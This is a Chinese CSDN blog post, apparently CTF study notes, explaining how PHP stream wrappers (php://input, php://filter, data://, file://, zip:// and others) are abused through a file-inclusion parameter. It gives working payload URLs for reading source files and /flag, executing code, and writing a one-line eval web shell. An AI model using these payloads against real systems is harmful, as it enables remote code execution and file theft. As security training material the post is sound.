php伪协议实现命令执行,任意文件读取

已于 2022-07-19 09:09:49 修改
阅读量6.2k 收藏 37
点赞数 8
分类专栏: web相关 文章标签: php 开发语言
于 2022-06-09 10:14:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44418229/article/details/125197168
版权

参考链接:PHP伪协议总结 - SegmentFault 思否

目录

1.file://协议

条件:

作用:

说明:

用法

示例:

2.php://协议

条件

作用:

说明

 php://filter使用

php://input的使用

3.data://协议

作用:

用法

4.zip:// & bzip:// & zlib:// 协议

作用:

示例:

总结

总结

在ctf中常用的有data:// , php://input , php://filter ,file://

php://input ,data://用来执行命令

1.php://input 的用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>

2.data://用法
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

php://filter,file://用来读取文件

3.php://filter用法
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(读取php文件需要先加密以下才能读出来,并且拿到的源码需要进行base64解码下)
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file://用法
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

1.file://协议

条件:

allow_url_fopen : off/on
allow_url_include: off/on

作用:

用于访问本地文件系统,在ctf中通常用来读取本地文件

在include() / require() / include_once() / require_once() 参数可控的情况下,即使导入非.php文件,如shell.txt ,依然按照php语法进行解析,这是include()函数所决定的

说明:

file:// 文件系统是php使用的默认封装协议,用于展示本地文件系统。

用法

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext

示例:

1.file://[文件的绝对路径和文件名]

http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

2.file://[文件的相对路径和文件名]

http://127.0.0.1/include.php?file=./phpinfo.txt

3.http://网络位置和文件名

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

2.php://协议

条件

allow_url_open : off/on
allow_url_include: 仅 php://input  php://stdin php://memory php://temp 需要on

作用:

php:// 访问各个输入/输出流 (I/O streams), 在ctf中经常使用的是 php://filter 和 php://input

php://filter 用于读取源码
php://input 用于执行php代码

说明

php提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流,标准输入输出流和错误描述符

 php://filter使用

php://filter/read=convert.base64-encode/resource=[文件名]

php://input的使用

http://127.0.0.1/include.php?file=php://input


[POST DATA部分]
<?php phpinfo(); ?>

写入一句话木马

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

3.data://协议

作用:

php>=5.2.0 , 可以使用data://数据流封装器,以传递相应格式的数据。通常用来执行php代码

用法

data://text/plain, ???
如
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

4.zip:// & bzip:// & zlib:// 协议

作用:

zip:// & bzip:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可以修改为任意后缀名,如 jpg,png,gif,xxx等

示例:

1.zip://[压缩文件绝对路径]%23[压缩文件内的子文件文件名](# 的编码为 %23)

压缩 phpinfo.txt 为phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传

http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2.compress.bzip2://file.bz2

压缩phpinfo.txt 为phpinfo.bz2 并上传(同样支持任意后缀名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

3.compress.zlib://file.gz

压缩phpinfo.txt 为phpinfo.gz 并上传(支持任意后缀名)

http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

jjj34
关注
  • 8
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF(Web)中关于执行读取文件命令的相关知识与绕过技巧
2401_84971075的博客
05-16 332
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
php伪协议
weixin_60719780的博客
01-27 4473
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件
PHP中的文件处理:PHP 读取文件
最新发布
新华编程特战队
04-14 929
无论是读取纯文本文件、CSV 文件、JSON 文件还是 XML 文件PHP 都提供了强大的解决方案来提取和操作其中的信息。在 PHP读取文件涉及打开文件读取其内容并根据获得的数据执行操作。在此示例中,使用 readfile() 读取文件“example.txt”,读取的字节数存储在 $bytesRead 变量中。通过打开文件并使用适当的功能,开发人员可以读取文本文件、CSV 文件、JSON 文件等的内容。在 PHP读取文件是一项基本操作,它允许开发人员访问和提取存储在文件中的数据。
PHP伪协议
m0_75178803的博客
04-02 1162
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
PHP文件操作---文件file
等,你的到来。
11-10 703
文件打开模式: 打开模式分为可读、可写、可写可读。 相信看了下图,大家就不会有什么疑惑了。 这里这三个类型带+的都可以可写可读,可是还是有一些区别的。必须w+的写入是覆盖的,a+的写入是追加的,原因取决于文件指针在哪里。文件打开关闭 需要说明的是,fopen里面的文件,如果不存在就创建,创建的话,就直接使用即可。 fopen(“文件路径”,“打开模式”);//得到一个resource
CTF(phpinfo)---使用封装协议读取PHP协议
千寻的博客
12-14 2685
文章目录知识点---文件包含---使用php封装协议方法---使用封装协议读取PHP文件访问封装协议Ctf案例第一步 访问ctf地址第二步 发现Phoinfo,并且是path=,考虑文件上传漏洞![在这里插入图片描述](https://img-blog.csdnimg.cn/20201214191636139.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ub
CTFHUB SSRF 【全】
Jay17的博客
04-17 1306
CTFHUB SSRF 题解 【全】
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取的漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
php实现读取超大文件的方法
10-25
主要介绍了php实现读取超大文件的方法,需要的朋友可以参考下
php实现读取CSV文件函数示例
10-20
主要介绍了php实现读取CSV文件函数,结合实例形式分析了php读取CSV文件及字符串、数组遍历与转换等操作技巧,需要的朋友可以参考下
php://input是干什么的?底层原理是什么?
长风破浪会有时的博客
06-07 415
是一个特殊的输入流(input stream),它允许你从请求的正文(body)中读取原始数据。它通常用于处理以 POST 方法发送的表单数据或者其他 HTTP 请求体中的数据。当 PHP 接收到一个 HTTP 请求时,它会解析请求头和请求体,并将请求体中的数据放在一个临时的输入流中。是一个只读流,只能用于读取请求体的数据。如果你尝试多次读取,可能会得到空的结果。然而,有时候你可能需要直接处理原始的请求体数据,这时候。)来读取流的内容,或者使用高级函数(例如。实际上就是指向这个临时输入流的一个封装。
SSRF(3)伪协议读取文件&Gopher协议的利用
m0_64417923的博客
05-12 4047
一:Http、Dict和file等协议的利用 1,内网访问 所以构造: /?url=http://127.0.0.1/flag.php 得到: ctfhub{ce475b59a4baee959112777b} 2,伪协议读取文件 最经典的PHP伪协议就是file:///协议了,可以用来读取php源码 构造payload: /?url=file:///var/www/html/flag.php 得到: 在单击右键查看源代码: 得到flag: ctfh..
ctfhub ssrf
shinygod的博客
09-26 489
先用file读一下源码,flag.php中有key且要本地访问,index.php可以传参,可以利用index里的curl用gopher构造post请求,在本地访问flag.php。用gopher写文件,具体原理可以看(https://blog.csdn.net/shinygod/article/details/126995090)的309题。那么直接打:(具体原理可看:https://blog.csdn.net/shinygod/article/details/127034013 的360题)
file_get_contents("php://input")的使用方法
热门推荐
中国石油大学 INThe Du Jin Feng
07-04 2万+
$data = file_get_contents("php://input");     php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 alwa
详解php://filter,伪协议的浅知识点
m0_75178803的博客
04-09 425
通过file协议可以访问本地文件系统,读取文件的内容可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取通过 include 或 require 语句,可将 PHP 文件内容插入另一个 PHP 文件(在服务器执行它之前)。include 和 require 语句相同,但在错误处理方面:require 会生成致命错误,并停止脚本include 只生成警告,并且脚本会继续。
文件包含
a965527596的博客
07-31 319
文件包含 1.原理 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的检验,从而使攻击者操作了预想之外的文件 2.危害 可能会导致包含webshell,文件读取命令执行等 3.判断和可能出现位置 a.判断 读取一个本地的文件看是否能去读取成功 b.可能出现位置 在file=参数,或者一个参数后跟着是文件名都可以试试 4.基础利用 - 直接包含webshell ?file=shell.jpg //可以用菜刀直接连接这个地址 - 利用php://filter/read协议 ?filename=php
php运算符= %3c%3c%3c,PHP命令&代码&执行&绕过
weixin_36088083的博客
03-27 540
一、命令执行/写shellevalfputs1fputs(fopen('t.php','w'),'')preg_replace ====mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )5.6以下可以执行5.6以上仍然...
shopxo download 任意文件读取漏洞
09-02
shopxo是一种流行的开源电商系统,以其简单易用和灵活性而备受欢迎。然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求,注入恶意代码来访问目标文件。攻击者可能可以通过执行一系列步骤来实现此目标,例如: 1. 识别目标系统上潜在的敏感文件,如数据库配置文件、用户身份验证文件等。 2. 构造特定的URL来请求这些文件,使用目标系统的下载功能。 3. 在URL中注入特殊字符或路径遍历符号,以绕过访问限制和读取目标文件。 一旦攻击者成功读取到目标文件,他们可能会进一步利用这些信息来实施其他攻击,例如窃取用户信息、篡改网站内容或者进行其他恶意活动。 为了防范shopxo download任意文件读取漏洞,网站管理员可以采取以下措施: 1. 及时更新shopxo系统以修复任何已知漏洞,并安装最新的补丁程序。 2. 限制对敏感文件的访问权限,确保只有授权的用户能够访问它们。 3. 验证和过滤用户输入,以防止任意文件读取漏洞的利用。 4. 实施Web应用程序防火墙(WAF),以监视和阻止恶意请求。 5. 定期进行安全审计和漏洞扫描,以及对服务器和应用程序配置进行安全性评估。 通过采取这些预防措施,可以最大限度地减少shopxo download任意文件读取漏洞的风险,并确保网站和用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值